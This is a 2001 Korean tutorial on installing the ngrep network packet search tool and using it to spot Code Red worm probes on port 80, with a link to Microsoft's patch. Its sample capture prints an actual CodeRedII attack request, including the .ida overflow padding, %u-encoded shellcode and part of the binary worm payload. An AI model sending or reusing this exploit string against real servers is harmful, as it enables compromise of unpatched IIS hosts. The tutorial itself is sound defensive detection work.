작성일: 2001-09-17
작성자: 강명규
OS: Linux 2.4.4 (intel)
ngrep은 유닉스 grep과 유사하다. 단지 사용하는 곳이 network을 소스를 삼는다는 것이 다른 점이다.
ngrep.sourceforge.net 사이트에서 ngrep을 받아온다.
현재(2001-09-17) 최신 버전은 1.40이다.
http://prdownloads.sourceforge.net/ngrep/ngrep-1.40.tar.gz
ngrep은 libpcap라이브러리를 필요로 하므로, 자신의 서버에 설치되지 않았다면
ftp://ftp.ee.lbl.gov/libpcap.tar.Z에서 받아 설치한다.
[kang@ns /down]$ tar xvzf ngrep-1.40.tar.gz -C /usr/local/src
[root@ns /down]# cd /usr/local/src/ngrep
[root@ns ngrep]# ./configure; make; make install
사용하기
요즘 유행하는 Code Red웜의 파악은 다음과 같이 할 수 있다.
ngrep -qt ".ida" tcp port 80
다음은 실제 접속했을때의 로그를 표시한 것이다.
윈도서버로 운영할 경우 필히 코드레드 패치를 해야겠다.
http://www.microsoft.com/korea/technet/security/bulletin/MS01-033.asp
유닉스계열의 경우 별다른 조치가 필요없다. 즉, 공격대상이 아니다.
[root@ns /root]# ngrep -qt "default.ida" tcp port 80
T 2001/09/17 01:26:31.307148 211.41.29.231:15916 -> 211.41.23.236:80 [A]
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..C
ontent-type: text/xml.Content-length: 3379 ........`........dg.6..dg.&.......h.........P.U......
P.U..@.....X....U.=.......=..............T....u..~0...........F0.........CodeRedII...$.U.f.....8..
...P.......j...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,..............F4.E.Pj..u...
........j.j..U.P.U.Ou..;...i.T....&....&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....s...
.>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.j.Th~f...u..U.Yj...p...P.u..U........tK3..
U.=3'..u?..h.........l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f...u..U.Y...u1.....X
-....j.h....P.u..U.=....u.j.j......P.u..U..u..U..........w...........xu......`......d$.dg....Xa..
dg.6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I.r ...A..<.GetPu..|..rocAu..J.I...J$
........J.......D$$dg....Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread..u..U..E......
GetTickCount..u..U..E......Sleep..u..U..E......GetSystemDefaultLangID..u..U..E......GetSystemDirec
toryA..u..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E......GlobalAddAtomA
T 2001/09/17 01:26:31.991328 211.41.23.236:80 -> 211.41.29.231:15916 [AP]
HTTP/1.1 404 Not Found..Date: Sun, 16 Sep 2001 16:26:31 GMT..Server: Apache..Connection: close..Co
ntent-Type: text/html; charset=iso-8859-1....<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<H
TML><HEAD>.<TITLE>404 Not Found</TITLE>.</HEAD><BODY>.<H1>Not Found</H1>.The requested URL /defaul
t.ida was not found on this server.<P>.<HR>.<ADDRESS>Apache/1.3.20 Server at www.dbakorea.pe.kr Po
rt 80</ADDRESS>.</BODY></HTML>.
유용한 사용법은 차후 추가하겠다. |
This article comes from dbakorea.pe.kr (Leave this line as is)
|
